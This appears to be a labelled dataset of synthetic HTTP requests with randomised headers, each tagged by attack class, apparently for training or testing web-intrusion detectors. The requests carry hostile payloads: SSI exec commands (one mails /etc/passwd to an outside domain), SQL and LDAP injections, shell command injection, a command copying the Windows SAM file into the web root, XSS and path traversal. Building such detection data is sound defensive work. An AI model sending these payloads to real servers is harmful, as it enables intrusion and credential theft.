Trailer: Trailer
User-Agent: xuadf1/6.6.4.7.3
UA-CPU: PowerPC
UA-Disp: 5670,938,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 5281x2497
Via: 6.8 49.0.73.241, 2.4 www.stx5.tiff, 3.3 109.229.21.193
Transfer-Encoding: deflate
Upgrade: tlle/3.2, ouiu/2.7, 6nb/4.0, iuoaC/4.5, ioatma/4.1
Warning: 156 193.81.211.74 "9aeu3wesnnaer" 
X-Forwarded-For: 134.201.54.76
X-Serial-Number: 521013041943
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43515
Start - Id: 40108
class: SSI
GET /tBiez55.urIos9ZDWxDa/nSciybtqrjnotthMh/nouEozmaatceneutonk4/Eqxtr/tNLa.9D/4access_logzkh.dpwhere/4k9a85/sm5Wef.bK8Qq/Nia/xsGRjXXGrvVIDQFimr/mfQqL2iEn.gif?suliaIsEoEei=Cgl4A&7H3Ndl=305888&5imdo7=387381639&v8=%3C%21--++%23exec+cmd%3D%22%2Fbin%2Fls++-l+++%2Fhome%2Fpjo%2Fuetaaswt%22+++++--%3E&eL=%7Cn&7I1V6zeehtpassoI=69 HTTP/1.0
Host: www.64rbiu.be:80
Connection: qqiealcE
Accept: application/*;q=0.1
Accept-Charset: windows-874;q=0.2, ks_c_5601-1987, x-mac-roman;q=0.9, isiri-3342;q=0.2, iso-8859-6;q=0.7
Accept-Encoding: deflate;q=0.1, gzip, identity;q=0.9
Accept-Language: *
Cache-Control: O7cSAir=ucety
Client-ip: 173.159.194.156
Cookie: Bnnycepnl=3Oriakhpec3b;garcxeeL=ow739Ss1oy
Cookie2: $Version="674"
Date: Mon, 12 Nov 07 13:07:40 GMT
ETag: W/"aBKdxlbr.ECzHxyEdr"
Expect: 100-continue
From: ihPoede@2hepettfu.be
If-Modified-Since: Mon, 02 May 05 04:22:06 UTC
If-Unmodified-Since: Thu, 17 Nov 05 07:52:05 GMT
If-Match: *
If-None-Match: *
If-Range: Mon, 10 Jan 05 02:28:29 UTC
Max-Forwards: 9987
MIME-Version: 0.3
Pragma: mnwL='x'
Proxy-Authorization: rxlppx muowon6=meWd
Authorization: Basic amVUbmU6dGVncmhy
Range: 12545-4
Referer: /w1yFOf/Zwfcrsy/itt50/de8sl0dz/8Iiraqe.html
TE: deflate
Trailer: Proxy-Authorization
User-Agent: Mozilla/3.4 (compatible; MSIE 3.8; Open BSD i386; 93fiae)
UA-CPU: 68000
UA-Disp: 952,4343,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 6612x3935
Via: la2u/1.6 www.rfprsI.jpg
Transfer-Encoding: identity
Upgrade: Iisgx/0.5, asoins/6.2
Warning: 525 47.98.135.216 "dlaiinerst" 
X-Forwarded-For: 241.68.225.159
X-Serial-Number: 606454137105
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40108
Start - Id: 39464
class: SSI
GET /Inwob2eEt7uBUctnSt/kbin5V6tOAlKUwSN/oB/9Wuw-0LLcp/6hUD/q.7QechoBhomeX/htt/oYTN.wM.kXQD_YX2h-/sObesa/JHL.dll?lrgdupua0hswhrt=%3C%21--%23echo+var%3D%22date_gmt%22--%3E HTTP/1.0
Host: 119.177.103.145:17232
Connection: close
Accept: image/gif
Accept-Charset: *;q=0.8
Accept-Encoding: *
Accept-Language: h9-1;q=0.9, auvrdpi-acuuSr, iE-ae
Cache-Control: min-fresh=38895
Client-ip: 91.67.57.209
Cookie: ssYsnhi4cnL4p7T=aUciboA8Iem0lsn0e;Haj=e:r ;TXAbV=3854;4ito6Rle=r-a_
Cookie2: $Version="5"
Date: Fri, 21 Aug 09 13:16:31 CET
ETag: "LhCcRWhjKnJRhPq"
Expect: ris5rtt=czils
From: a7fo@TTrA.it
If-Modified-Since: Thu, 28 May 09 01:42:21 GMT
If-Unmodified-Since: Wed, 25 Feb 04 03:59:06 GMT
If-Match: "t6TsBAr4@C.TVfEkYD"
If-Range: Fri, 30 Oct 09 12:03:54 GMT
Max-Forwards: 13
MIME-Version: 7.4
Pragma: dcsce='7aa'
Authorization: Digest qop=auth-int
Range: -2397
Referer: http://a7dewiio.cz/nmer/isslsn/Bpchmmp6/msOahi.mpg
TE: gzip
Trailer: Referer
User-Agent: Mozilla/8.5 (compatible; Konqueror/4.4; Windows NT; e6iorep2O)
UA-CPU: 68000
UA-Disp: 725,135,16
UA-OS: Linux
UA-Color: color32
Via: sorier/7.9 51.84.209.111, FTP/7.4 43.149.2.58
Transfer-Encoding: compress
Upgrade: mwv/5.9, jxt9eh/8.4, lch/8.1, nSc/9.6
Warning: 920 www.sgadis2e.js "onamHixfuolaten" 
----: --------------------------------------------

null

End - Id: 39464
Start - Id: 38465
class: LdapInjection
GET /n3WcROQAemhHwNbdTkD/tdVw@i5Obb/AX/apicdtl/kP92DwgetT/omr2h0ann9vxtlaeahfe/ejyaUzlFtk6QVm/1DwGUTstdinRR/rcpH/4K2lGuG/mo7Hnvk66kin7sI/e9hzneriRtadiarkr2a.jpg?1hnnSe9=erieesedaa%2F&rlecs0E3=f1elg+tdt%3Fdzic+rS&ofhsKood5sgoius=43519986&3RscGTipfexecS=319&munaief7yNtf=95842123&7D9xwtzJx=328&l1dsqn6ssaei=aebtaokeisyi4&uri=efo%29%28%7C+++%28GslT%3D*%29&lr5nmisgnZhoi=3lpVh2bqrqiaoptqcatS2q&etwKsHftuam2h=sh1UU5LQCX8&ur=tie8n43ahylseorto&enearwtifrNAa=2&o34tuco=eyrwgHraene&h3=-ns&p2ayDhaving9=841 HTTP/1.0
Host: 192.114.126.30:80
Connection: ssiwheo
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.9
Accept-Language: fwlI4-sreiaST;q=0.5, edn5a-plid, ot-5t7Tytoh
Cache-Control: only-if-cached
Client-ip: 180.75.19.86
Cookie: hmhoeaznnwgso=5429;osAtggxhshee2t=onmjfarumxudo;Etqe=9;ifxt=re;my=19021;pbaeeeuwEeBotl=r7A6aAtzgGM
Cookie2: $Version="554"
Date: Tue, 29 Apr 08 06:30:48 UTC
ETag: "dAKakF.oYxCdLRoI.Z"
Expect: betmtr=nyjiso;hCgrf6g
From: n6tmeiWw@degonC.cz
If-Modified-Since: Fri, 16 Dec 05 09:23:41 UTC
If-Unmodified-Since: Thu, 16 Jun 05 07:24:08 CET
If-Match: "Oe5MZJIDJqKj12W"
If-None-Match: *
If-Range: Tue, 26 Sep 06 13:37:33 UTC
Max-Forwards: 5578
MIME-Version: 3.3
Pragma: no-cache
Proxy-Authorization: iiEb vcnyig9=nalmt
Authorization: NTLM cjNucGFlQWR4bWVvdFl0YXJoZWxEdHRleUw4ZGVkYW9zcWllaWRlb2xlcmI=
Range: 24-,76759-,-19589
Referer: http://orOcgay.biz/j5cqw/xie2/imHsqn.css
TE: deflate;q=0.5,trailers
Trailer: If-Match
User-Agent: Tsodk/9.4
UA-CPU: 68000
UA-Disp: 3037,4035,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 632x125
Via: 5.0 www.eilhyt.js:22, 9.7 202.26.190.36
Transfer-Encoding: compress
Upgrade: Nlohim/6.2, ors/6.8, ine/9.2, aauq/0.7, cvl87u/8.4
Warning: 346 www.tt8o.css "ptUwt" "Mon, 17 Mar 08 22:41:42 GMT"
X-Forwarded-For: 96.44.37.3
X-Serial-Number: 8565701730547644653
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38465
Start - Id: 35175
class: SqlInjection
GET /emLaFU/uesC93itr/Sorrhinuar1prohuStoo/ltanj9s/eHoIImxEltjol.cfm?lGr=6344691&dsheD=wSQNeIbh&istA2=%27+++++OR++++%27tcdE%27+++%3C+++%27X&uecr=iwa&bprj=92&erslonop=3ahcnSr&ttzt=dt%26x&usdSo=16804573&Ee4aqk1Sioh=7&mm4F=esb48siasdmeciyt&-JYxo=2145797 HTTP/1.1
Host: www.uct7e.it:80
Connection: close
Accept: */*;q=0.0
Accept-Charset: isiri-3342, koi8;q=0.8, shift_jis;q=0.7, iso-10646-ucs-2;q=0.5
Accept-Encoding: *;q=0.7
Accept-Language: dosaemsr-oezfiht;q=0.1, 23tlgi1-Hienb8a;q=0.9, er-s7inS;q=0.2
Cache-Control: min-fresh=01908
Client-ip: 132.54.240.29
Cookie: nllvjeNuomde=t;hsUCr69fjKN=0173;suil8irTmnnoul=yz$dnnEt:e;ndsvdc=bslseg~ l:xseh)iR;KIt3=Ctjpdps5soD;wtdantwiak=58317244
Cookie2: $Version="4"
Date: Thu, 14 Oct 04 01:26:17 UTC
ETag: "WokkLc._JOvblYu"
Expect: itEV
From: as5oeh@nl7ehee.ch
If-Modified-Since: Fri, 12 Jan 07 14:37:21 CET
If-Unmodified-Since: Wed, 08 Nov 06 09:36:44 UTC
If-Match: *
If-None-Match: *
If-Range: "bJzlcxk.qajChamg"
Max-Forwards: 81
MIME-Version: 6.6
Proxy-Authorization: NTLM bWM1dG80b0x0MjBzYWFzaXVmZXRzczlyM211NG5yaHR2YjNtbW5zY25sZTlsNWZv
Authorization: Digest nc=3BDe77D3
Range: -619874,-90
Referer: http://rnxeeo.net/npabd/sxlubh/hm7ob/semuiemd/ttehsr3u.mpg
TE: deflate;q=0.9
Trailer: Expect
User-Agent: uphitwt0kT3hetdtt
UA-CPU: StrongARM
UA-Disp: 1579,9873,8
Via: 2.7 69.209.232.196, 7.3 48.195.98.142, 5.5 www.6cno.css
Transfer-Encoding: gzip
Warning: 749 www.DeYsfD6.gif:90 "Albacnauthecopstseao" "Mon, 14 Feb 05 18:04:54 CET"
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35175
Start - Id: 41445
class: SqlInjection
POST /xb-uvar7A./adUC/mb0@access_logNXvcD5/uotfairAnmer/urhhlim8DshoTe0eiwt/siOhoedpiTstni/btH9Oetho/t.QeaeY61MpOXec.exe? HTTP/1.0
Content-Length: 131
Content-Language: oLamtyE,hequ
Content-Encoding: compress
Content-Location: http://mf3us.net/tdatf9dc/nhspj/u2Aljl.txt
Content-MD5: c2k2NGRvaXkwd2h5ZGNlbA==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 20 Aug 06 03:32:39 GMT
Last-Modified: Mon, 30 Nov 09 04:09:04 GMT
Host: www.otnSssBe.biz
Connection: toomaa
Accept: */*
Accept-Charset: x-mac-ce;q=0.3, windows-1253;q=0.5, windows-1254, iso-8859-8-i;q=0.7, iso-2022-kr;q=0.5
Accept-Encoding: 
Accept-Language: e6odsA6-Sl, ry-niprrqa;q=0.6, gT0-h0oOr
Cache-Control: min-fresh=678
Client-ip: 166.4.252.29
Cookie: rnsseeOyn=yerhsoeyeorno0oz;lpCmbtsiie=0127904
Cookie2: $Version="9"
Date: Sun, 24 Jun 07 05:06:23 GMT
ETag: "leLIR_bfgo22sOQ"
Expect: wObo=kcnn
From: svetgtH@ellbmBnam.fr
If-Modified-Since: Mon, 06 Apr 09 21:14:19 GMT
If-Unmodified-Since: Thu, 04 Feb 10 14:37:41 UTC
If-Match: *
If-None-Match: "a_YCkpd2EOy2bNf8ohzt"
If-Range: "0IUH3NPlhheyaV1Rq"
Max-Forwards: 0
MIME-Version: 1.3
Pragma: no-cache
Proxy-Authorization: Digest uri=http://www.qaseCc.net/doze/ikttvm/5wrye.js
Authorization: Digest realm
Range: 78106-77620,1196-
Referer: /suo1aa/3iRia/diyIa0e/5l9Gale/arvM.cgi
TE: deflate;q=0.2
Trailer: Date
User-Agent: Mozilla/9.5 (Windows; U; Win98 1.0; d2-ai; rv:5.3.1) Gecko/75960431
UA-CPU: MIPS
UA-Disp: 338,3350,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 738x118
Via: HTTP/4.8 14.7.10.11, 5.6 76.230.3.218, lka/0.4 www.ye7aetr.gif
Transfer-Encoding: gzip
Upgrade: oin5s/2.1, itrt/4.7, tsm/7.1
Warning: 671 145.233.120.251 "tiua3dtweorond5gt" 
X-Forwarded-For: 12.79.200.187
X-Serial-Number: 9168693821015244526
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

onAznnc=ee4eehorifssoooy&b4qhtm8icpre=chairs'  UNION  SELECT    Stfis    FROM     dba_users    WHERE     name   like     '%25

End - Id: 41445
Start - Id: 39892
class: SSI
GET /o1ccfe4RT2pifa/I4H9.mdb? HTTP/1.0
Host: www.euf0a.org
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: 2-dgcaai, 6hear9e-arwsdS8H;q=0.3, qibe1O-hjtde1
Cache-Control: min-fresh=30154
Client-ip: 244.32.83.55
Cookie: jIriarbun=<!--  #exec   cmd="/bin/mail  craipnesr.com  <     /etc/passwd"-->
Cookie2: $Version="7"
Date: Sat, 30 Jan 10 10:46:50 GMT
ETag: "t4rMkKvCDj@1e6qYb."
Expect: 100-continue
From: hesirg7@ieucaapnt.de
If-Modified-Since: Sun, 13 Jun 04 21:12:34 CET
If-Match: "CN7oJjlV0jRPQ7rL"
If-None-Match: "-7ql@x4jok-0HSvwQz"
If-Range: *
Max-Forwards: 7
Pragma: limdev='econtsrt'
Authorization: Digest cnonce="soibee6"
Referer: http://nteoec.net/trE0te/9elnn0R.cfm
TE: gzip
Trailer: From
User-Agent: Nolehdhs/5.1.5
UA-OS: WinNT
Via: eeyE/2.5 www.ssoerIt.js, 3taoe/5.4 155.130.53.254
Transfer-Encoding: h22z; adotlh0=oreo
Warning: 298 www.e7eu.gif "tun0ip5preqandnq" 
----: ----------------------------------------

null

End - Id: 39892
Start - Id: 36648
class: OsCommanding
POST /Dyudvar/Yz/IrdOenf7rL1xl7ent/ytth/tzdXoblsG4KZV/c14Am4qlNlLhv.G/_6pxmlM-I/a@6kAIzs@NIB9f/elesTh9rs/iM_ev.-sVSAWo/n5k/c@hpr@AbfU8Xd.jsp? HTTP/1.1
Content-Length: 199
Content-Language: dmasyPl,hohfC6u
Content-Encoding: compress
Content-Location: /yxvd/7reger/smSdr/rohtm.bin
Content-MD5: N25lbllsaHNqY3NoNGU5bw==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 01 Sep 09 17:18:20 CET
Last-Modified: Fri, 15 Oct 04 04:37:52 UTC
Host: 82.180.121.148
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-8;q=0.1
Accept-Encoding: 
Accept-Language: u-omr;q=0.0, erEi-al2n6, a-telene;q=0.7
Cache-Control: min-fresh=301
Cookie2: $Version="718"
Date: Sun, 17 Jan 10 20:38:44 CET
ETag: "LWyNH-1tT2hT4oPF"
If-Modified-Since: Wed, 22 Aug 07 01:05:45 GMT
If-Unmodified-Since: Wed, 15 Oct 08 05:14:57 UTC
If-Match: *
If-None-Match: "tvJu4o@X7_TKt6U"
Max-Forwards: 92
Authorization: Digest nc=BcCC4BAB
Referer: http://3shBe.fr/pbas/mlesib/rafkzgtb.php3
User-Agent: rcoTwn9oehSns9I4yrl2
UA-CPU: StrongARM
UA-OS: Windows 98
UA-Pixels: 782x498
Via: 1.9 93.236.226.84
Transfer-Encoding: identity
X-Forwarded-For: 24.190.144.96

eD6iveMyu=sitd%Ot<%atOh&7bwf=2oZAzB&5tecIteess=s&TfhinEy=229.237.38.1| copy c:\winnt\repair\sam._ c:\inetpub\wwwroot\sam.ddd&xottts5goe6viEa=183945669&e04eezA0ttFi4=54C7yY7GA8

End - Id: 36648
Start - Id: 35178
class: SqlInjection
GET /n1K_h9HHT@D5LuZdP/rptbeochRioRniasl4t/bAcNsx2O8Ozk9C9A_5/p87Kr30/eesflp.css?bodyI0RAUFpfvg1=%27+++%29+++UNION+ALL+++SELECT+5880%2C72%2C2%2C144%2C523+++FROM++en+WHERE++%28++%27%27+++%3D++++%27 HTTP/1.0
Host: www.nmso.ch
Connection: serh
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.2
Accept-Language: sor-xithLsmH;q=0.9, com-hs9EanNa;q=0.9, ozusT-naad5rp, n14d-uung, tnel-jenou
Cache-Control: only-if-cached
Client-ip: 190.117.195.127
Cookie: ssdptwo=rr7fruJeh;mmdneJoecc=9869692
Cookie2: $Version="835"
Date: Fri, 08 Oct 04 24:52:23 UTC
ETag: "03P6MG1v10dHj@5U"
Expect: itEV
From: as5oeh@nl7ehee.ch
If-Modified-Since: Wed, 17 Sep 08 16:54:06 UTC
If-Unmodified-Since: Wed, 08 Nov 06 09:36:44 UTC
If-Match: "KJjx2tr1ocariw4dVxfc"
If-None-Match: "af2RR3WxHISuLZUy"
If-Range: "QehjsL9y3KCIrUGqzBY_"
Max-Forwards: 5
MIME-Version: 2.3
Pragma: beer=veI
Proxy-Authorization: ortr bdoanD=ot23oe
Authorization: Basic c2FyYWJMOmVwRXVpdA==
Range: 5131-,-0
Referer: http://hdr2egn.cz/le8rom/1oiwa.gif
TE: trailers,gzip,trailers
Trailer: From
User-Agent: og2l49nwcl/1.7.6.0.8
UA-CPU: StrongARM
UA-Disp: 571,0582,16
Via: 6.7 www.ettWl.css
Transfer-Encoding: identity
Warning: 749 www.DeYsfD6.gif:90 "Albacnauthecopstseao" "Mon, 14 Feb 05 18:04:54 CET"
X-Forwarded-For: 74.88.12.154
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35178
Start - Id: 40122
class: SSI
GET /peXkq6hmOpJRS4YoX/kigltnegotT.shtml?tii66scidnlnn=%3C%21--+%23exec+++++cmd%3D%22%2Fbin%2Fls++-l+%2Fhome%2FdatTdrrH%2F4hrrxk%22+++--%3E&vah1a31=libi5rs%2F%3Dol HTTP/1.1
Host: www.inrsoo.gov:80
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: gzip
Accept-Language: *
Cache-Control: res=esg
Client-ip: 233.132.159.137
Cookie: neuMdlyvlwnI=1stasH8seg/3setsdo;e3iup=lW.P;reuo5littjr0=fnlhewmh
Cookie2: $Version="3"
Date: Wed, 31 Aug 05 20:27:09 CET
ETag: W/"2pP93uTxOps6cWjVyp"
Expect: 100-continue
From: ryup@srni.ch
If-Modified-Since: Fri, 01 Feb 08 04:55:25 CET
If-Unmodified-Since: Fri, 16 May 08 24:37:33 GMT
If-Match: "evoRPiZxEK_61Fssz3"
If-None-Match: *
If-Range: "@xosm7GKD7Nqb_6q"
Max-Forwards: 90
MIME-Version: 9.5
Pragma: aWohni='se3tct'
Proxy-Authorization: Basic d2VuYTE1aWE6c3lhYzY=
Authorization: nrhrn glnNrs=uTci
Range: 7457-,9-
Referer: http://www.vdsorMu.it/wvxah0l/4ssh.avi
TE: chunked,chunked;q=0.6,gzip;q=0.1
Trailer: Proxy-Authorization
User-Agent: bddoesacsaO
UA-CPU: Sparc
UA-Disp: 6012,9490,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 768x931
Via: FTP/7.1 www.iaaitnwc.gif:19845, 2.6 131.29.96.60
Transfer-Encoding: compress
Upgrade: cCeeG/6.9, rnime/3.6
Warning: 530 www.keiqse.jpeg "tjsEot3eeoicdet6rlc" 
X-Forwarded-For: 241.68.225.159
X-Serial-Number: 42315795
----: -------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 40122
Start - Id: 47911
class: XSS
GET /faulttc65einsaD.php4?SLoss=2&er9eetbeotiae=6&uf-ZfPTYOTdR=xaanEseml&M1nui=%3C%21--+--+--%3E%3Cscript%3E%5Balert+++%28%278ha%27%29%3B%5D%3C%2Fscript+%3E%3C%21--+--+--%3E&g9silbp=tmpt&ag9tr=aiframe7tseof%3Bdunes%40gN&pc=rRwf3os1fTTr&ncteoiPeM14hJ=0opt-e%26%5Ct&N7goKCO1Wbody=iq5zw&bCot2ae7=Uta%28 HTTP/1.0
Host: 157.41.58.15:80
Connection: close
Accept: */*;q=0.3
Accept-Charset: x-mac-chinesetrad, x-mac-japanese, x-mac-turkish, windows-874;q=0.9, x-mac-icelandic;q=0.2
Accept-Encoding: deflate;q=0.7, identity;q=0.1
Accept-Language: *;q=0.1
Cache-Control: max-stale
Client-ip: 93.12.193.202
Cookie: Rktneo5azb=z;ecelrdeji0o6osC=t5ea7dU1p;oealOtscd9t5=oftuk64guaatyexeno;tT=allychildma
Cookie2: $Version="6"
Date: Mon, 14 Jul 08 03:04:52 CET
ETag: W/"cJc-HCc20ZvA@@p"
Expect: ststi=La4tm;napsfnLs
From: 4ebutle@EleUossins.org
If-Modified-Since: Sat, 21 Mar 09 13:22:19 UTC
If-Unmodified-Since: Sat, 13 Aug 05 06:40:41 GMT
If-Match: "T9_Qd8iIpYqOkC3m"
If-None-Match: "kF-F9w5nbD2A0l1"
If-Range: Mon, 29 May 06 08:12:56 CET
Max-Forwards: 3
MIME-Version: 8.4
Pragma: 7U=msniie
Proxy-Authorization: NTLM c2lzZXVkcXNvT252d3NzNWlSbmVsc3NUcnZvZXVCNm90MnhlU250c1M1ZWVPZGV1
Authorization: Digest realm
Range: -419,3-
Referer: /aITa/nnIenf/agiia.dll
TE: gzip,trailers,trailers
Trailer: Transfer-Encoding
User-Agent: otlhsi3at
UA-CPU: x86
UA-Disp: 1161,524,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 229x467
Via: 2.8 www.lsffikew.jpeg, 1eefe/4.1 www.A89m.gif, HTTP/9.0 217.16.173.81
Transfer-Encoding: nipm
Upgrade: anee5/8.2, scSotq/7.5, 3th/0.1, krezts/1.0
Warning: 342 www.a3Idnne.js "aeea" "Tue, 23 Feb 10 05:56:33 UTC"
X-Forwarded-For: 90.98.250.32
X-Serial-Number: 8754080340538
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47911
Start - Id: 45847
class: PathTransversal
GET /Msiei/VLod/EDyZpiGHk/cdvwritotoWhnanp/tunsm7qd9fE/et0eg1nh5ajdah/twbtimyths.html?he3cne=t4eonpnfdd&eofs=8738488&e1oe=..........................WINNTsystem.ini HTTP/1.1
Host: 53.169.230.20
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: gzip;q=0.5
Accept-Language: *;q=0.3
Cache-Control: no-transform
Client-ip: 145.76.47.201
Cookie: eolrs=tiad eeascript'Gai2htpass-dnt;Ohdwceen=620;w6noee8hl4wN=r
Cookie2: $Version="59"
Date: Sat, 29 Dec 07 13:07:21 UTC
ETag: W/"aJyevn6vEVafqY5vIsv4"
Expect: 100-continue
From: ix4abcph@mnt9ssu.gov
If-Modified-Since: Mon, 21 Aug 06 12:44:36 GMT
If-Unmodified-Since: Tue, 24 Jan 06 10:56:52 UTC
If-Match: "wCKfAVscJRiyLtAZJk."
If-None-Match: *
If-Range: *
Max-Forwards: 9149
MIME-Version: 2.5
Pragma: no-cache
Proxy-Authorization: Digest uri=http://www.ncrl8sh.ch/2nled.asp
Authorization: Digest opaque="cPtdenyt"
Range: 505894-77
Referer: /erntuAd/VwS0a.mspx
TE: deflate,chunked;q=0.4,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/0.4 (Windows; U; Win98 7.1; hf-O7; rv:9.5.1) Gecko/37329322
UA-CPU: Sparc
UA-Disp: 011,2094,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 8255x255
Via: 8irhe/2.0 209.35.243.27:6, sbun/9.0 www.Rcryaeym.css:11
Transfer-Encoding: compress
Upgrade: inw5/1.5, wwesr/8.9, 5rte/1.6, d8hhli/8.3
Warning: 146 143.244.193.232 "tjezxosaoyuieeityv" 
X-Forwarded-For: 239.104.254.12
X-Serial-Number: 25397478987579
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45847
Start - Id: 37819
class: LdapInjection
GET /DoJrrl/y3j11u2X2/8Amnmi6eitts/dmwy6aiesrxCncme/ewG7oX91ht/lw8mot8arnen0o5t/3TEXCwOerYBhVTL/stddthaanvm.php4?an9t=%29++++%28++%7C++++%28displayName%3Dhad*%29+++%28name++++%3Dhad*++%29%28++++mail%3Dhad*++++%29&drhbhnsmLed=Chadivhh7&rnefoswp90iau=Oac2s%28tio&UfMjlvT=srH7sock_stream+n7wyrsMl&dtdiAdll=sdc7Ytfgeheg3id HTTP/1.0
Host: www.dt8qlixnee.st:184
Connection: L9myRi9
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: *
Accept-Language: *;q=0.3
Cache-Control: no-transform
Client-ip: 128.134.23.121
Cookie: uogtr5dh1c=0Bwghmo4I;an3=r;pfrn=523;ae29T13B5nslu=rIoe
Cookie2: $Version="1"
Date: Mon, 18 Jul 05 16:35:43 UTC
ETag: "Ob3LephYBYDp-6jiyC"
Expect: 100-continue
From: inAltlp8@n6nlbheD8q.it
If-Modified-Since: Thu, 20 Nov 08 20:04:09 CET
If-Unmodified-Since: Tue, 16 Feb 10 19:41:15 GMT
If-Match: "XdyF.DsXoPOBrd-Cv"
If-None-Match: "y61iNKusWICoXiV"
If-Range: "hT0..GSfvGJaO_91M0"
Max-Forwards: 87
MIME-Version: 0.8
Pragma: McTS='3iM'
Proxy-Authorization: Basic bmVvdDZzOndpdGNvcQ==
Authorization: Basic N2FkYmlyczp5bHFyb2VJ
Range: 094778-515740,335144-
Referer: /nttnet.sh
TE: deflate;q=0.2,chunked
Trailer: TE
User-Agent: ybctn7ql/1.4
UA-CPU: x86
UA-Disp: 0815,794,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 2010x029
Via: aer4t/9.6 145.49.168.205, 7.4 www.hE9y5s.jpg
Transfer-Encoding: deflate
Upgrade: ziaeo/3.7, fyav/7.8, dpa0ed/1.0, mfirt/0.2, pSli/6.6
Warning: 166 78.105.41.24 "sewleo7lheo" "Tue, 16 Jun 09 20:36:56 UTC"
X-Forwarded-For: 178.127.38.107
X-Serial-Number: 9737658238850824210
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37819
Start - Id: 43204
class: OsCommanding
GET /rKlHrN/VLgwBN1EcBq/cgxaFVVBUYIT/Syoleaw/rKynk2AL.gcG9S8xV3/oeu5psotIoeopt3s/edtambskogdi4e/i0QxvTnB.F2t3g6ZF6/deleteSdeleteQimg_includeidocumentHmAm/-Qp/rvfP/5sflIJmailUxmreplaceCx.jpg?tzdlonEmeenyh=x%3Fde%3Fllst6i+sho&M1iInmI2Tasen=owpnDtt6jmabenimx&Sks6aRlfsp1g0t=%3Etq%2F%3D&NSheAoeAtye=Sf&ltl6nw0eiSn=44746264&5aerhQ=++%3B+++echo++%3Bw%3B++++uname+-a++%3Bid&nteyoAim0uah=S9&Si1e=s%40kxtJ&Y5ezb5s=tryovwDrl&dtmi0Igm=rD&s82nfiezn=xetau3u1a0rvcb2bx&ZF.kQps1u=ruJdIOKf_g&oor=lssghyw3t%3B+r&KIzBchildYupg=+7stdingroup+byTnl%5B&dI8tnihaNgdpl=evo8oenGTzbietzto HTTP/1.0
Host: 73.210.83.148
Connection: keep-alive
Accept: */*
Accept-Charset: cp-950, isiri-3342;q=0.9, windows-1252;q=0.3, koi8;q=0.5
Accept-Encoding: *
Accept-Language: s-rutrty;q=0.3, e-tabtilm;q=0.4, vanda-Er
Cache-Control: max-stale
Client-ip: 79.214.12.199
Cookie: xeetpptfrikma=442;ganoobosn=updateWe6lntan;C5wccatnn=oy_
Cookie2: $Version="350"
Date: Mon, 26 May 08 06:04:53 GMT
ETag: "XR31.2u_UhvXSfees"
Expect: 100-continue
From: eena@eaooz.de
If-Modified-Since: Wed, 19 May 04 13:52:13 UTC
If-Unmodified-Since: Mon, 02 Mar 09 24:20:08 GMT
If-Match: "yWREyEkbO0ViXpuRPe-G"
If-None-Match: "cA4pSYaTcJ3D8d7YyXs"
If-Range: *
Max-Forwards: 8552
MIME-Version: 7.7
Pragma: erat='uuinktm'
Proxy-Authorization: mfey smnSW=fltvk
Authorization: NTLM c2FjdGVhaTg0aW9hMmNpcm8yQ2FyYWh4b3VjdDR1N2VlOHVJYQ==
Range: 66907-4
Referer: /iExtiT/nSnlg.sh
TE: chunked;q=0.1,chunked,trailers
Trailer: If-Unmodified-Since
User-Agent: uGjExH http://www.DcdrOl.com
UA-CPU: 68000
UA-Disp: 1503,1276,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 953x846
Via: HTTP/6.1 200.202.172.26:89, 1.6 www.atx6os.html
Transfer-Encoding: mhetxa
Upgrade: hi11/1.2
Warning: 254 www.o7hkelz.js:8351 "etdelrar1" 
X-Forwarded-For: 36.142.205.114
X-Serial-Number: 3512760212193
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43204
Start - Id: 40921
class: SSI
GET /lon/hre0kOLmEl48Jw0VqG/26s/t_WleEMruCQiF@6/h5ZrWKr2vVsw/sT_s.8Wra/UKf/uhtzmwuebm4M/HQbRs576AxAnca/se/bhwselect-fSdelete5Q/LvhttpsElHusr_fxe.png?b_XgqftpDFV.=01489&toosmgeiNo4he=a&RemioamsiSndsv9=5s6&zE29group byMNLnPetmp=142885&a9=btiU+&yo0MY9=%3C%21--++%23odbc+++++statement++%3D++%22select++ciroiimi%2C++++2emlyo%2C+++++eR8e++from+++pramogero+++++order+by+++6%2C+++++22%2C++0%22+--%3E&4ktr=qnull+tpitLwk&saJtrsor5ees=netR&sat6b8tWpac=mu&lfnzednte09i0t=8031806&0g=8tmp%5Ceadivytelnet HTTP/1.1
Host: 217.146.246.161:34
Connection: honiyur
Accept: */*
